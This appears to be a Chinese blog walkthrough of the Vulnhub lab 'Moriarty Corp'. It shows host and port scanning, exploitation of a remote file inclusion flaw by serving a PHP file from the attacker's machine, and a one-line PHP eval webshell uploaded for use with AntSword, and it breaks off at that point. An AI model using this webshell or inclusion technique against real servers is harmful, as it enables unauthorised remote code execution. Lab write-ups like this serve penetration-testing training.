BoredHackerBlog:Moriarty Corp【攻略】

本文介绍了Moriarty Corp在Vulnhub上的渗透测试攻略,涉及信息收集、Web渗透(文件包含漏洞利用)、内网渗透(包括代理设置、内网扫描和密码爆破)、SSH爆破、任意密码修改以及远程执行代码。通过这一系列步骤,逐步揭示了靶场中的安全漏洞并获取多个flag。
摘要由CSDN通过智能技术生成


介绍

  • Vulnhub地址:BoredHacker博客: Moriarty Corp ~ VulnHub

  • 发布日期: 29 Mar 2020

  • 难度:中等

  • 描述:

    你好代理。

    你来这里执行一项特殊任务。

    一项任务是摧毁最大的武器供应商之一,即莫里亚蒂公司。

    在网络应用程序中输入标志{开始}以开始使用!

    笔记:

    • Web 面板位于端口 8000 上(不在范围内。不要攻击)
    • 标志以 #_flag.txt 格式存储。标志以标志{}格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
    • 若要暂时停止播放,请暂停 VM。不要关闭它。
    • 添加标志时,Web 应用会在后台启动 docker 容器。关闭并重新启动会搞砸它。
  • 靶场环境:

机器 ip
kali 10.4.7.135
靶机 10.4.7.141:8000

信息收集

主机发现

arp-scan -l

image-20231030163924339

端口扫描

namp -sV -O 10.4.7.141

image-20231030163958117

网站探测

根据 Vulnhub 描述访问8000端口。

输入 flag{start} 开始。

image-20231030164017797

根据提示,继续访问80端口。

image-20231030164031548

在网站的连接中发现文件包含漏洞。

文件包含漏洞,通常分为本地文件包含和远程文件包含。本地文件包含,通常需要能够写入 webshell 的文件进行包含,进而获取 shell 权限。远程文件包含,可对远程写入 webshell 的文件进行包含,获取 shell 权限。

image-20231030164107226

Web渗透

文件包含

在 kali 开启 Web 服务,靶机访问 php.php 文件进行包含,验证远程文件漏洞存在。

echo "<?php phpinfo(); ?>" > php.php
python3 -m http.server 80

image-20231024174409289

上传一句话木马。

<?php eval($_POST['ant']; ?>

image-20231024201328589

image-20231024201347532

使用中国蚁剑连接。

下载地址:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值